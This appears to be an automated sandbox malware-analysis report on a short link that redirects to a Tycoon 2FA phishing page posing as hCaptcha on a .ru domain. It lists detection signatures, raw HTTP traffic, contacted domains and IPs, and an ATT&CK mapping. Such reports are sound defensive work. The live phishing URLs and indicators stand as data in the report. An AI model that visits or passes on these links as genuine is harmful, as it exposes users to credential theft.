Edit tour

Windows Analysis Report
https://s.id/gQtbn

Overview

General Information

Sample URL:	https://s.id/gQtbn
Analysis ID:	1649389
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected AntiDebug via timestamp check

Yara detected HtmlPhish44

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

Creates files inside the system directory

Deletes files inside the Windows folder

Detected suspicious crossdomain redirect

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3448,i,5827661054831206110,7969331695241214273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3740 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://s.id/gQtbn" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_53	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

HTML

Source	Rule	Description	Author
0.2.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.2.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
0.0.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.0.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.4.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.3.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.0.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.0.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 5 entries

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://xkll.ebechlockhor.ru/favicon.ico

Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: https://xkll.ebechlockhor.ru/PrCq/	Joe Sandbox AI: Score: 9 Reasons: The brand 'hCaptcha' is known and typically associated with the domain 'hcaptcha.com'., The URL 'xkll.ebechlockhor.ru' does not match the legitimate domain for hCaptcha., The domain 'ebechlockhor.ru' is unrelated to hCaptcha and uses a Russian domain extension, which is unusual for hCaptcha., The presence of an unrelated domain and subdomain suggests a potential phishing attempt., No direct association between the brand 'hCaptcha' and the provided URL. DOM: 0.0.pages.csv
Source: https://xkll.ebechlockhor.ru/PrCq/	Joe Sandbox AI: Score: 9 Reasons: The brand 'hCaptcha' is known and typically associated with the domain 'hcaptcha.com'., The URL 'xkll.ebechlockhor.ru' does not match the legitimate domain for hCaptcha., The domain 'ebechlockhor.ru' is unrelated to hCaptcha and appears suspicious., The presence of an unusual subdomain 'xkll' and the domain 'ebechlockhor.ru' suggests potential phishing., The domain extension '.ru' is not typically associated with hCaptcha, which raises suspicion. DOM: 0.1.pages.csv

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_53, type: DROPPED

Yara detected Invisible JS

Source: Yara match	File source: 0.0.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML

Yara detected Obfuscation Via HangulCharacter

Source: Yara match	File source: 0.0.d.script.csv, type: HTML
Source: Yara match	File source: 0.3.d.script.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Yara detected Tycoon 2FA PaaS

Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 0.4.d.script.csv, type: HTML

AI detected suspicious Javascript

Source: 0.1..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://xkll.ebechlockhor.ru/PrCq/... The script contains obfuscated code and URLs, uses dynamic code execution with eval, and interacts with a suspicious domain (9C.ebechlockhor.ru). These high-risk indicators suggest malicious intent, such as phishing or data exfiltration.

Source: https://xkll.ebechlockhor.ru/PrCq/	HTTP Parser: No favicon
Source: https://xkll.ebechlockhor.ru/PrCq/	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.84.85.178:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.84.85.178:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.206:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.206:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: s.id to https://xkll.ebechlockhor.ru/prcq/

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.67
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /gQtbn HTTP/1.1Host: s.idConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /PrCq/ HTTP/1.1Host: xkll.ebechlockhor.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: xkll.ebechlockhor.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xkll.ebechlockhor.ru/PrCq/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImIyMkhpYjNMdE04OUdURUVjeDV6anc9PSIsInZhbHVlIjoiMTlJd3BQZGVxUjZoa25JWDc3Znp0c1lIbzBuTEtIN1NhRU5ZVnRZTHFmVnQxQXpOYVFyUHc3TGJ0ZzNXVUh5K3NsMWY5NDJGanFzbEVkdHN0UTljamwwaWZyODA1cVdpMUk4Y2FZeGlzVlNIc2lPKzJvT01QT2t0T1hGdWgwQzQiLCJtYWMiOiI4YTc4ODcyNWY5NjA1YjUzMmM3YjNlYzI5OWViYzRhMTQ4ZDJhOWVjZWQwYjM2OWJlNDk1MDc2YzI3MGUyMTA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9ucUc4eS9hK3NkVFYzM21BSyt3UkE9PSIsInZhbHVlIjoiQUFzMU9wb25Va0xzWGk3YTFxQVUxQzFJYXFwTEhvc3QraWYwUWw0ZklxNWk1UUZCSS9qYTFsTnNaQUF4NkpUODJ5MDNWbVZERmxkSGpkdlBrV2I2Qi8xOXh5d0RId3NxZ0svd0tXNmFOYW10NHlMam9GU2FzRU5teG8xZ3QwRDYiLCJtYWMiOiJlNDRjMDU2MWZkZGEyMzA1MDlhNWNmMDIxMDc1ZGFhOWY2MGUwYjMyYTRmOTdlY2JlZTNhNTIxYTdlMDcxZjlmIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /chiriya$8mxr1j1 HTTP/1.1Host: vu1.viugbu.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://xkll.ebechlockhor.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xkll.ebechlockhor.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$8mxr1j1 HTTP/1.1Host: vu1.viugbu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$8mxr1j1 HTTP/1.1Host: vu1.viugbu.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://xkll.ebechlockhor.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xkll.ebechlockhor.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$8mxr1j1 HTTP/1.1Host: vu1.viugbu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$8mxr1j1 HTTP/1.1Host: vu1.viugbu.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://xkll.ebechlockhor.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xkll.ebechlockhor.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$8mxr1j1 HTTP/1.1Host: vu1.viugbu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: s.id
Source: global traffic	DNS traffic detected: DNS query: xkll.ebechlockhor.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: vu1.viugbu.ru

Source: unknown

HTTP traffic detected: POST /report/v4?s=t1okB%2BhQZbfzNIlQ5F7IAU49qiaTj3ow%2FuPjpc2mw%2BfZT%2FfqqgWVXEra4pmWNdQeC3AN0oJFjDJdvXrwIHDN8yy2NMmgcUCoU7V4Ovx9kFzRDsJ169lHA4t2%2B2JCaw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 433Content-Type: application/reports+jsonOrigin: https://xkll.ebechlockhor.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:31:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1okB%2BhQZbfzNIlQ5F7IAU49qiaTj3ow%2FuPjpc2mw%2BfZT%2FfqqgWVXEra4pmWNdQeC3AN0oJFjDJdvXrwIHDN8yy2NMmgcUCoU7V4Ovx9kFzRDsJ169lHA4t2%2B2JCaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=16819&min_rtt=4363&rtt_var=22199&sent=415&recv=163&lost=0&retrans=11&sent_bytes=502065&recv_bytes=32671&delivery_rate=3138868&cwnd=257&unsent_bytes=0&cid=edbcee927d75a18d&ts=543618&x=0"Age: 8735Server: cloudflareCF-RAY: 9268619bbb930f70-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=85573&min_rtt=85515&rtt_var=18091&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1903&delivery_rate=35680&cwnd=252&unsent_bytes=0&cid=e02a54deddeb2b5d&ts=197&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.84.85.178:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.84.85.178:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.206:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.206:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir5672_1567507299

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir5672_1567507299

Jump to behavior

Source: classification engine

Classification label: mal100.phis.evad.win@22/5@12/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3448,i,5827661054831206110,7969331695241214273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3740 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://s.id/gQtbn"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3448,i,5827661054831206110,7969331695241214273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3740 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 0.2.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://s.id/gQtbn	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label	Link
https://xkll.ebechlockhor.ru/favicon.ico	100%	Avira URL Cloud	phishing
https://vu1.viugbu.ru/chiriya$8mxr1j1	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
xkll.ebechlockhor.ru	172.64.80.1	true	true	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	high
s.id	193.84.85.178	true	false	high
vu1.viugbu.ru	104.21.95.206	true	false	unknown
www.google.com	142.250.64.68	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://a.nel.cloudflare.com/report/v4?s=t1okB%2BhQZbfzNIlQ5F7IAU49qiaTj3ow%2FuPjpc2mw%2BfZT%2FfqqgWVXEra4pmWNdQeC3AN0oJFjDJdvXrwIHDN8yy2NMmgcUCoU7V4Ovx9kFzRDsJ169lHA4t2%2B2JCaw%3D%3D	false		high
https://xkll.ebechlockhor.ru/PrCq/	true		unknown
http://c.pki.goog/r/gsr1.crl	false		high
http://c.pki.goog/r/r4.crl	false		high
https://s.id/gQtbn	false		high
https://vu1.viugbu.ru/chiriya$8mxr1j1	false	Avira URL Cloud: safe	unknown
https://xkll.ebechlockhor.ru/favicon.ico	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.84.85.178	s.id	unknown	59796	STORMSYSTEMS-ASRU	false
104.21.95.206	vu1.viugbu.ru	United States	13335	CLOUDFLARENETUS	false
